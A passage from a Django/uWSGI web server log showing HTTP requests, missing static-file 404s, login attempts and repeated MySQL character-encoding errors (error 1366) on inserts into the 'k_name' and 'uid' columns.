manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE8\\xA1\\xA8\\xE7\\x99\\xBD...' for column 'k_name' at row 1") +[pid: 11057|app: 0|req: 818/1080] 180.160.72.163 () {48 vars in 1178 bytes} [Thu Jan 14 08:40:07 2021] POST /kind-manage/ => generated 207189 bytes in 106 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 819/1081] 180.160.72.163 () {42 vars in 1124 bytes} [Thu Jan 14 08:40:07 2021] GET /kind-manage/? => generated 8283 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 820/1082] 180.160.72.163 () {40 vars in 1087 bytes} [Thu Jan 14 08:40:07 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 821/1083] 180.160.72.163 () {40 vars in 1075 bytes} [Thu Jan 14 08:40:07 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 822/1084] 180.160.72.163 () {40 vars in 1079 bytes} [Thu Jan 14 08:40:07 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 823/1085] 180.160.72.163 () {40 vars in 1063 bytes} [Thu Jan 14 08:40:07 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[uwsgi-http key: 188.131.132.108:8000 client_addr: 180.160.72.163 client_port: 1746] hr_write(): Broken pipe [plugins/http/http.c line 565] +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 824/1086] 180.160.72.163 () {40 vars in 1063 bytes} [Thu Jan 14 08:40:07 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 825/1087] 180.160.72.163 () {40 vars in 1043 bytes} [Thu Jan 14 08:40:07 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 36 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 826/1088] 180.160.72.163 () {40 vars in 1119 bytes} [Thu Jan 14 08:40:07 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 827/1089] 180.160.72.163 () {40 vars in 1011 bytes} [Thu Jan 14 08:40:07 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 828/1090] 180.160.72.163 () {40 vars in 1009 bytes} [Thu Jan 14 08:40:07 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 829/1091] 61.151.179.84 () {32 vars in 498 bytes} [Thu Jan 14 08:40:43 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 830/1092] 101.91.62.89 () {32 vars in 593 bytes} [Thu Jan 14 08:40:51 2021] GET /home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 831/1093] 101.91.60.106 () {32 vars in 505 bytes} [Thu Jan 14 08:41:00 2021] GET /publish => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 177 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 832/1094] 180.160.72.163 () {40 vars in 1075 bytes} [Thu Jan 14 08:41:06 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 833/1095] 180.160.72.163 () {40 vars in 1087 bytes} [Thu Jan 14 08:41:06 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 834/1096] 180.160.72.163 () {40 vars in 1043 bytes} [Thu Jan 14 08:41:06 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 835/1097] 180.160.72.163 () {40 vars in 1079 bytes} [Thu Jan 14 08:41:06 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 836/1098] 180.160.72.163 () {40 vars in 1063 bytes} [Thu Jan 14 08:41:06 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 22 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 837/1099] 180.160.72.163 () {40 vars in 1063 bytes} [Thu Jan 14 08:41:06 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 838/1100] 180.160.72.163 () {40 vars in 1011 bytes} [Thu Jan 14 08:41:06 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 839/1101] 180.160.72.163 () {40 vars in 1119 bytes} [Thu Jan 14 08:41:06 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 840/1102] 180.160.72.163 () {40 vars in 1009 bytes} [Thu Jan 14 08:41:06 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 841/1103] 180.160.72.163 () {40 vars in 1056 bytes} [Thu Jan 14 08:41:12 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 842/1104] 180.160.72.163 () {48 vars in 1161 bytes} [Thu Jan 14 08:41:29 2021] POST /login/ => generated 27 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 843/1105] 180.160.72.163 () {42 vars in 1104 bytes} [Thu Jan 14 08:41:29 2021] GET /home/ => generated 7869 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 844/1106] 180.160.72.163 () {42 vars in 1103 bytes} [Thu Jan 14 08:41:35 2021] GET /home/ => generated 7869 bytes in 12 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[] +[pid: 11057|app: 0|req: 845/1107] 180.160.72.163 () {42 vars in 1111 bytes} [Thu Jan 14 08:41:37 2021] GET /all-3-0-0 => generated 8291 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 11057|app: -1|req: -1/1108] 180.160.72.163 () {40 vars in 1007 bytes} [Thu Jan 14 08:41:37 2021] GET /static/js/jquery.easing.1.3.js => generated 8097 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1109] 180.160.72.163 () {40 vars in 1005 bytes} [Thu Jan 14 08:41:37 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 11057|app: 0|req: 846/1110] 180.160.72.163 () {50 vars in 1258 bytes} [Thu Jan 14 08:41:38 2021] POST /all-0-0-0 => generated 8267 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 847/1111] 180.160.72.163 () {50 vars in 1258 bytes} [Thu Jan 14 08:41:45 2021] POST /all-0-0-0 => generated 8267 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 11057|app: -1|req: -1/1112] 219.228.146.156 () {40 vars in 914 bytes} [Thu Jan 14 08:42:14 2021] GET /static/img/back-top-btn.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: 0|req: 848/1113] 180.160.72.163 () {40 vars in 1056 bytes} [Thu Jan 14 08:43:22 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 849/1114] 180.160.72.163 () {48 vars in 1161 bytes} [Thu Jan 14 08:43:35 2021] POST /login/ => generated 27 bytes in 27 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 850/1115] 180.160.72.163 () {42 vars in 1104 bytes} [Thu Jan 14 08:43:35 2021] GET /home/ => generated 7864 bytes in 11 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 851/1116] 180.160.72.163 () {40 vars in 1056 bytes} [Thu Jan 14 08:43:49 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 852/1117] 180.160.72.163 () {48 vars in 1161 bytes} [Thu Jan 14 08:43:50 2021] POST /login/ => generated 82 bytes in 5 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 853/1118] 180.160.72.163 () {48 vars in 1161 bytes} [Thu Jan 14 08:43:59 2021] POST /login/ => generated 27 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 854/1119] 180.160.72.163 () {42 vars in 1104 bytes} [Thu Jan 14 08:43:59 2021] GET /home/ => generated 7864 bytes in 10 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 855/1120] 180.160.72.163 () {40 vars in 1056 bytes} [Thu Jan 14 08:45:20 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 856/1121] 180.160.72.163 () {48 vars in 1161 bytes} [Thu Jan 14 08:45:51 2021] POST /login/ => generated 27 bytes in 21 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 857/1122] 180.160.72.163 () {42 vars in 1104 bytes} [Thu Jan 14 08:45:52 2021] GET /home/ => generated 7869 bytes in 16 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 858/1123] 180.160.72.163 () {40 vars in 1055 bytes} [Thu Jan 14 08:46:00 2021] GET /login/ => generated 6428 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE7\\xA5\\x9E\\xE7\\xA7\\x98...' for column 'uid' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE7\\xA5\\x9E\\xE7\\xA7\\x98...' for column 'uid' at row 1") +[pid: 11057|app: 0|req: 859/1124] 180.160.72.163 () {48 vars in 1160 bytes} [Thu Jan 14 08:46:14 2021] POST /login/ => generated 210206 bytes in 161 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE7\\xA5\\x9E\\xE7\\xA7\\x98...' for column 'uid' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE7\\xA5\\x9E\\xE7\\xA7\\x98...' for column 'uid' at row 1") +[pid: 11057|app: 0|req: 860/1125] 180.160.72.163 () {48 vars in 1160 bytes} [Thu Jan 14 08:46:39 2021] POST /login/ => generated 210269 bytes in 129 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 861/1126] 180.160.72.163 () {48 vars in 1160 bytes} [Thu Jan 14 08:46:58 2021] POST /login/ => generated 27 bytes in 24 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 862/1127] 180.160.72.163 () {42 vars in 1103 bytes} [Thu Jan 14 08:46:58 2021] GET /home/ => generated 7869 bytes in 12 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +Not Found: / +[pid: 11057|app: 0|req: 863/1128] 83.97.20.29 () {26 vars in 278 bytes} [Thu Jan 14 08:47:11 2021] GET / => generated 3429 bytes in 8 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 864/1129] 180.160.72.163 () {40 vars in 1063 bytes} [Thu Jan 14 08:47:22 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 11057|app: -1|req: -1/1130] 180.160.72.163 () {40 vars in 1098 bytes} [Thu Jan 14 08:47:22 2021] GET /static/img/back-top-btn.png => generated 1789 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 11057|app: 0|req: 865/1131] 180.160.72.163 () {40 vars in 1063 bytes} [Thu Jan 14 08:47:24 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 866/1132] 180.160.72.163 () {48 vars in 1174 bytes} [Thu Jan 14 08:47:30 2021] POST /login/ => generated 27 bytes in 25 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 867/1133] 180.160.72.163 () {42 vars in 1111 bytes} [Thu Jan 14 08:47:30 2021] GET /home/ => generated 7869 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 868/1134] 180.160.72.163 () {40 vars in 894 bytes} [Thu Jan 14 08:48:13 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 11057|app: -1|req: -1/1135] 180.160.72.163 () {40 vars in 863 bytes} [Thu Jan 14 08:48:13 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1136] 180.160.72.163 () {40 vars in 885 bytes} [Thu Jan 14 08:48:13 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1137] 180.160.72.163 () {40 vars in 867 bytes} [Thu Jan 14 08:48:13 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1138] 180.160.72.163 () {40 vars in 865 bytes} [Thu Jan 14 08:48:13 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1139] 180.160.72.163 () {40 vars in 871 bytes} [Thu Jan 14 08:48:13 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 